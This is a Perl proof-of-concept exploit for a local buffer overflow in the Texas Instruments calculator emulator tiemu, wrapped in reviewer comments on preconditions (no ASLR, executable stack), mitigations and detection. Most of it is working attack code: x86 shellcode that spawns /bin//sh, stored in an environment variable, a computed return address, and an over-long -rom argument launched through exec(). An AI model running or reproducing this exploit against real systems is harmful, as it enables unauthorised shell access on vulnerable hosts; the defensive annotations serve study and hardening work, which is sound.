#!/usr/bin/perl
##########################################################################
# Texas Instruments Emulator (tiemu) local buffer-overflow proof of concept
# Affected version named by the author: 3.03-nogdb+dfsg-3
#
# The offset is taken from the command line so the same script can be
# tried on different *NIX flavours.
#
# Earlier discussion of the same issue:
#   https://www.exploit-db.com/exploits/39692/
#   https://packetstormsecurity.com/files/136679/Texas-Instruments-Calculators-Emulator-3.03-nogdb-dfsg-3-Buffer-Overflow.html
#
# EMAIL -> n_a at tutanota.com
#
# Reviewer notes (defensive reading):
#   * The script passes an over-long value after "-rom=" to tiemu; per the
#     advisories linked above this overruns a buffer in the emulator.
#     NOTE(review): the vulnerable function is not shown here - confirm
#     against the advisories.
#   * The return address is derived from the fixed constant 0xbffffffa.
#     That only works when the stack sits at a predictable address and the
#     environment area is executable, i.e. presumably a 32-bit Linux target
#     with ASLR disabled and no NX / non-executable stack.
#   * Mitigations: keep ASLR and NX enabled, build with a stack protector
#     and _FORTIFY_SOURCE, and run a tiemu build that bounds-checks the
#     -rom argument.
#   * Detection: a tiemu process started with a very long -rom argument
#     containing repeated non-printable 4-byte groups, an unusual binary
#     environment variable (here "NNN"), or tiemu spawning a shell.
##########################################################################

# Path of the target binary. It is used twice: in the command string given
# to exec() and, through its length, in the address arithmetic below.
$filename = "usr/bin/tiemu"; #path name of the binary

# Payload bytes, kept exactly as published. Raw byte string that ends in
# "\xcd\x80" (x86 "int 0x80") and embeds the strings "/bin" and "//sh".
$shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\xb0\x0b\xcd\x80";

# Estimate where the payload will sit in the target's memory: start from a
# fixed address and subtract the payload length and the path length.
# NOTE(review): this presumes the classic fixed stack-top layout; with ASLR
# the real address changes on every run.
$ret = 0xbffffffa - length($shellcode) - length($filename);

# User-supplied adjustment to the estimated address. It is not validated;
# without an argument it is undef, which Perl treats as 0 in the additions
# below (no "use warnings" is in effect in this script).
$offs = $ARGV[0];

# Banner and usage text, then a one-second pause before continuing.
print "\n***Local Exploit for Texas Instruments Emulator***\n";
print "\t\tBy N_A\n\n";
print "Use: $0 Offset\n\n";
sleep 1;

# Show the address that will be written into the buffer.
printf("Ret Shellcode 0x%x\n",$ret + $offs);

# Encode the address as a 4-byte value in native byte order
# (pack 'l' = signed 32-bit long).
$adr = pack('l', ($ret + $offs));

# Build the over-long argument: 96 filler bytes followed by six copies of
# the packed address (96 + 6 * 4 = 120 bytes in total).
$buff = 'A' x 96;
$buff .= $adr x 6;

# Store the payload in the NNN environment variable. The exec() below
# replaces this process, so the target inherits that environment.
local($ENV{'NNN'}) = $shellcode;

# Launch the target with the crafted value after "-rom=". The command is a
# single interpolated string, so Perl may hand it to /bin/sh for parsing.
exec("$filename -rom= $buff");
#eof